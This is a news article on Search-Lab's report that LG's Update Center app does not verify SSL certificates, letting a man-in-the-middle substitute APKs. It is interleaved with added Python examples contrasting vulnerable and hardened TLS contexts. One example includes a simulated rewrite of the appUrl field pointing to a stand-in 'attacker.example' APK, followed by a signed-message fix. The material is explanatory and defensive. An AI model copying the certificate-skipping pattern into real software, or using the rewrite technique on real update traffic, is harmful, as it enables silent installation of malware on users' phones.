Researcher Says LG App Update Mechanism Doesn’t Verify SSL Cert

Many smartphones manufactured by LG contain a vulnerability that allows an attacker in a man-in-the-middle position to replace an APK file delivered by LG's own app update mechanism with a malicious file of the attacker's choice.

The problem is the result of several conditions on LG phones. Like other manufacturers, LG includes custom apps on its handsets, which are not available through the normal Google Play store. The apps are pre-loaded and have a separate update mechanism that relies on contacting an LG server to download new code. Researchers at Search-Lab in Hungary found that the update process for these apps does not validate the SSL/TLS certificate presented by the server on the other end, so the client cannot tell LG's server from an impostor, opening users up to man-in-the-middle attacks.
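The missing transport check, shown with Python's ssl module as an added illustration (this is not LG's or Search-Lab's code; the host name is the one named in the article, while the pin digest and the connect helper are assumptions for illustration). The first context accepts any certificate, which is the class of bug reported; the second validates the chain and host name and optionally pins the leaf certificate.

```python
# Added example, not code from the article or from LG. Python's ssl module
# stands in for whatever HTTPS client the Android app uses; UPDATE_HOST is the
# server named in the article, everything else is an ASSUMPTION.
import hashlib
import hmac
import socket
import ssl

UPDATE_HOST = "lgcpm.com"  # server the Update Center app contacts, per the article


def vulnerable_context() -> ssl.SSLContext:
    """Accepts any certificate from anyone: a man in the middle can present a
    self-signed certificate and the client will talk to it as if it were LG."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_context() -> ssl.SSLContext:
    """Chain validation against the system trust store plus host name check."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED and check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def context_is_safe(ctx: ssl.SSLContext) -> bool:
    """True only if the context verifies the chain AND the host name."""
    return ctx.verify_mode == ssl.CERT_REQUIRED and bool(ctx.check_hostname)


def cert_fingerprint(der_cert: bytes) -> str:
    """SHA-256 of a DER certificate, the form usually pinned in clients."""
    return hashlib.sha256(der_cert).hexdigest()


def pin_matches(der_cert: bytes, pinned_sha256_hex: str) -> bool:
    """Optional second line of defence: compare the presented leaf certificate
    against a digest baked into the client. Constant-time comparison so the
    check itself leaks nothing."""
    return hmac.compare_digest(cert_fingerprint(der_cert), pinned_sha256_hex)


def connect_to_update_server(pinned_sha256_hex: str, port: int = 443) -> ssl.SSLSocket:
    """ASSUMED helper showing where the checks sit; not exercised offline.
    Raises ssl.SSLCertVerificationError on a bad chain or host name, and
    ValueError if the leaf certificate does not match the pin."""
    ctx = hardened_context()
    raw = socket.create_connection((UPDATE_HOST, port))
    tls = ctx.wrap_socket(raw, server_hostname=UPDATE_HOST)
    leaf = tls.getpeercert(binary_form=True)
    if not pin_matches(leaf, pinned_sha256_hex):
        tls.close()
        raise ValueError("update server certificate does not match pin")
    return tls
```

Pinning is a trade-off: it stops a MITM even when a trusted CA is compromised, but every certificate rotation on the server then needs a client update, which is exactly the channel this bug breaks, so pin a backup key as well.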

“Since new applications and/or application upgrades are installed through this channel in APK form without the need for any additional confirmation from the user, a malicious attacker can abuse the functionality to install arbitrary applications into the victim smart phones. These applications might use any permission (except the ones requiring signature by system key), effectively circumventing Android’s own platform security,” Search-Lab wrote in an explanation of the vulnerability.

The process is controlled on LG phones by the Update Center app, and when the app looks for new updates, it contacts the server at lgcpm.com. The app is designed to install updates automatically, and the researchers say that an attacker in a MITM position would be able to hijack the connection silently and replace a target app with a malicious one.

“When fetching new applications, the client looks for the ‘appUrl’ field, which holds a base64 encoded, encrypted URL. The encryption key is symmetric, it is based on the certKey field, which is part of the same message. Since there is no integrity protection applied to the messages, an attacker can intercept the update response and replace the value of appUrl with any arbitrary URL pointing to a potentially malicious APK,” the researchers said.

“This way the handset fetches the APK file controlled by the attacker without the user’s knowledge. This can even occur in the background, when the Update Center believes that a new version of an LG application is available.”
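The message-level weakness the researchers describe, as an added example that is not Search-Lab's or LG's code. The field names appUrl and certKey and the "encrypted URL, key from certKey, no integrity protection" design follow the write-up; the cipher, key derivation, JSON layout and the HMAC-based fix are assumptions for illustration. The attacker side only needs to re-encrypt a URL under the certKey that travels in the same message; the hardened client rejects the tampered message because its signature no longer matches, and additionally refuses APK URLs that do not point at the vendor's host.

```python
# Added example, not code from the article, Search-Lab or LG. Field names come
# from the write-up; the cipher, key derivation and fix are ASSUMPTIONS.
import base64
import hashlib
import hmac
import json
from typing import Optional
from urllib.parse import urlsplit

UPDATE_HOST = "lgcpm.com"  # server named in the article


def _keystream(cert_key: str, length: int) -> bytes:
    """ASSUMPTION: toy stream cipher (SHA-256 in counter mode over certKey).
    Any real symmetric cipher behaves the same for the attack: whoever can
    read certKey can encrypt."""
    out, ctr = b"", 0
    while len(out) < length:
        out += hashlib.sha256(cert_key.encode() + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:length]


def encrypt_url(url: str, cert_key: str) -> str:
    raw = url.encode()
    ct = bytes(a ^ b for a, b in zip(raw, _keystream(cert_key, len(raw))))
    return base64.b64encode(ct).decode()


def decrypt_url(app_url: str, cert_key: str) -> str:
    ct = base64.b64decode(app_url)
    return bytes(a ^ b for a, b in zip(ct, _keystream(cert_key, len(ct)))).decode()


def build_update_response(apk_url: str, cert_key: str) -> dict:
    """What the update server sends (constructed sample layout)."""
    return {"appUrl": encrypt_url(apk_url, cert_key), "certKey": cert_key}


def mitm_rewrite(response: dict, evil_url: str) -> dict:
    """Attacker in the middle (reachable because the client skips certificate
    validation). certKey rides in the same message, so re-encrypting an
    attacker-chosen URL under it is trivial."""
    tampered = dict(response)
    tampered["appUrl"] = encrypt_url(evil_url, response["certKey"])
    return tampered


def vulnerable_client_target(response: dict) -> str:
    """As described: decrypt appUrl with certKey and fetch whatever it names."""
    return decrypt_url(response["appUrl"], response["certKey"])


# Fix: authenticate the message with a key that is NOT in the message.
# ASSUMPTION: HMAC with a client-side verify key. Since a symmetric key can be
# pulled out of an APK, a production client should verify an asymmetric
# signature against a pinned public key instead; the control flow is the same.

def _canonical(msg: dict) -> bytes:
    return json.dumps(msg, sort_keys=True, separators=(",", ":")).encode()


def sign_response(response: dict, signing_key: bytes) -> dict:
    tag = hmac.new(signing_key, _canonical(response), "sha256").hexdigest()
    return {**response, "sig": tag}


def hardened_client_target(signed: dict, verify_key: bytes) -> Optional[str]:
    """Returns the APK URL to fetch, or None when the update must be refused."""
    msg = {k: v for k, v in signed.items() if k != "sig"}
    expected = hmac.new(verify_key, _canonical(msg), "sha256").hexdigest()
    if not hmac.compare_digest(expected, signed.get("sig", "")):
        return None                       # integrity failure: refuse the update
    url = decrypt_url(msg["appUrl"], msg["certKey"])
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.hostname != UPDATE_HOST:
        return None                       # never fetch APKs from anywhere else
    return url


if __name__ == "__main__":
    key = b"constructed-demo-key"
    good = build_update_response("https://lgcpm.com/apps/update.apk", "c3rtk3y")
    evil = mitm_rewrite(good, "http://attacker.example/evil.apk")
    print("vulnerable client fetches:", vulnerable_client_target(evil))
    signed = sign_response(good, key)
    print("hardened, untampered:", hardened_client_target(signed, key))
    tampered = mitm_rewrite(signed, "http://attacker.example/evil.apk")
    print("hardened, tampered:  ", hardened_client_target(tampered, key))
```

The encryption of appUrl buys nothing here: confidentiality without integrity lets an active attacker substitute ciphertext at will, and putting the key in the same message removes even the need to break the cipher. Integrity of the manifest and of the downloaded APK (signature checks against a key baked into the client) is what the fix has to add, independently of whether the TLS bug is also fixed.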

Search-Lab reported the vulnerability to LG in November and said that the vendor plans to fix the bug only in new handsets and won’t push a fix to existing phones. As a workaround, they recommend turning off the “Auto app update” function on affected LG handsets.

“Since smart phone vendors need approval of carriers for every single application update, and in this case most of LG’s products are affected, LG made a business decision and they don’t provide the fix for most of their customers, at least ‘for the time being’,” Imre Rad of Search-Lab said by email.

LG officials said they are looking into the details of the report.